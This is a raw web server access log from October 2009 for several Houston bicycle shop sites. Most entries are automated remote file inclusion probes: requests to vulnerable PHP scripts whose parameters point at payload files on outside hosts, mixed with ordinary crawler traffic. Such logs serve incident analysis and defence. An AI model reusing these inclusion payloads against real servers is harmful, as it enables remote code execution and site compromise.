61.135.134.78 - - [09/Oct/2009:17:00:08 -0700] "GET /logs/access.log///skin/zero_vote/login.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:17:49:34 -0700] "GET /setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:17:49:34 -0700] "GET /logs/access.log%20%20//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:17:49:34 -0700] "GET /logs//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
194.8.74.124 - - [09/Oct/2009:17:50:32 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
194.8.74.124 - - [09/Oct/2009:17:50:32 -0700] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
194.8.74.124 - - [09/Oct/2009:17:50:33 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:17:51:53 -0700] "GET /setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:17:51:53 -0700] "GET /logs/access.log%20%20//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:17:51:53 -0700] "GET /logs//setup.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:56:35 -0700] "GET /setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:56:35 -0700] "GET /logs/access.log%20%20//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:56:35 -0700] "GET /logs//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:58:02 -0700] "GET /setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:58:02 -0700] "GET /logs//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:58:02 -0700] "GET /logs/access.log%20%20//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:58:30 -0700] "GET /setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:58:30 -0700] "GET /logs//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:17:58:30 -0700] "GET /logs/access.log%20%20//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:18:00:03 -0700] "GET /logs/access.log//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:18:00:48 -0700] "GET /logs/access.log//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [09/Oct/2009:18:01:49 -0700] "GET /logs/access.log//setup.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
38.108.180.24 - - [09/Oct/2009:18:05:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
38.108.180.24 - - [09/Oct/2009:18:05:08 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
38.108.180.24 - - [09/Oct/2009:18:05:17 -0700] "GET /translations/ HTTP/1.1" 200 3847 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
38.108.180.24 - - [09/Oct/2009:18:05:25 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
38.108.180.24 - - [09/Oct/2009:18:05:35 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
38.108.180.24 - - [09/Oct/2009:18:05:44 -0700] "GET /?N=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
38.108.180.24 - - [09/Oct/2009:18:05:56 -0700] "GET /?D=D HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "www.svbikes.com"
74.52.245.146 - - [09/Oct/2009:18:17:24 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.houstonbikeshop.com"
69.13.180.28 - - [09/Oct/2009:18:18:34 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "houstonbikeshop.com"
69.13.180.28 - - [09/Oct/2009:18:18:34 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "houstonbikeshop.com"
69.13.180.28 - - [09/Oct/2009:18:18:34 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "houstonbikeshop.com"
121.124.127.95 - - [09/Oct/2009:18:20:03 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
121.124.127.95 - - [09/Oct/2009:18:20:03 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
121.124.127.95 - - [09/Oct/2009:18:20:03 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.abdreality.cz/js/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.115.1.7 - - [09/Oct/2009:18:22:55 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:18:34:46 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:18:34:46 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:18:34:46 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:18:41:55 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:18:49:41 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:18:49:41 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:18:49:41 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:06:58 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:10:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:19:10:40 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:19:10:40 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:19:10:40 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
128.125.169.162 - - [09/Oct/2009:19:13:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.122.49.12 - - [09/Oct/2009:19:13:38 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:13:38 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:13:38 -0700] "GET /translations/Galician.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:13:38 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:14:05 -0700] "GET /translations/German.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [09/Oct/2009:19:22:51 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Oct/2009:19:22:52 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
67.195.112.152 - - [09/Oct/2009:19:25:22 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:19:26:34 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:28:14 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:28:14 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:19:28:14 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.129.119.14 - - [09/Oct/2009:19:29:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
128.125.169.162 - - [09/Oct/2009:19:30:01 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://banlat.ac.th/images/banner1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:40:44 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:42:20 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.122.49.12 - - [09/Oct/2009:19:42:20 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.122.49.12 - - [09/Oct/2009:19:42:20 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.122.49.12 - - [09/Oct/2009:19:44:41 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:49:47 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:49:47 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.49.12 - - [09/Oct/2009:19:49:47 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.30.161.243 - - [09/Oct/2009:20:03:48 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
65.55.115.175 - - [09/Oct/2009:20:08:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
58.61.164.39 - - [09/Oct/2009:20:25:30 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
128.125.169.162 - - [09/Oct/2009:20:25:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:20:25:50 -0700] "GET /translations//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:20:25:50 -0700] "GET /translations/English-US.txt//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:20:25:53 -0700] "GET /translations//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:20:25:53 -0700] "GET /translations/English-US.txt//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [09/Oct/2009:20:25:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.139 - - [09/Oct/2009:20:26:03 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
114.80.93.71 - - [09/Oct/2009:20:29:54 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
216.104.44.74 - - [09/Oct/2009:20:34:50 -0700] "GET /logs/access.log%20%20//korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.104.44.74 - - [09/Oct/2009:20:34:50 -0700] "GET /korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.104.44.74 - - [09/Oct/2009:20:34:50 -0700] "GET /logs//korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.170 - - [09/Oct/2009:20:36:12 -0700] "GET /korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.170 - - [09/Oct/2009:20:36:12 -0700] "GET /logs//korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.170 - - [09/Oct/2009:20:36:12 -0700] "GET /logs/access.log%20%20//korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:20:39:51 -0700] "GET /logs/access.log%20%20/skin/zero_vote/login.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:20:39:58 -0700] "GET /skin/zero_vote/login.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [09/Oct/2009:20:39:59 -0700] "GET /logs/skin/zero_vote/login.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.17 - - [09/Oct/2009:20:41:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://houstonbikeshop.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
72.30.161.243 - - [09/Oct/2009:20:41:13 -0700] "GET /logs/?S=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
61.129.64.174 - - [09/Oct/2009:20:50:33 -0700] "GET /logs/access.log%20%20//korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.129.64.174 - - [09/Oct/2009:20:50:35 -0700] "GET /korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.129.64.174 - - [09/Oct/2009:20:50:40 -0700] "GET /logs//korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.141 - - [09/Oct/2009:20:50:44 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
61.129.64.174 - - [09/Oct/2009:20:52:08 -0700] "GET /logs//korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.129.64.174 - - [09/Oct/2009:20:52:08 -0700] "GET /korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.129.64.174 - - [09/Oct/2009:20:52:08 -0700] "GET /logs/access.log%20%20//korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [09/Oct/2009:20:57:37 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Oct/2009:20:57:38 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
208.80.193.43 - - [09/Oct/2009:21:15:43 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; SaveWealth; FunWebProducts; .NET CLR 1.1.4322)" "bicyclestoreshouston.com"
124.115.1.8 - - [09/Oct/2009:21:18:30 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
74.6.8.89 - - [09/Oct/2009:21:33:48 -0700] "GET /?S=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:46:39 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:46:39 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:46:39 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:46:39 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:46:39 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:46:39 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:46:40 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:46:40 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:46:40 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:47:12 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
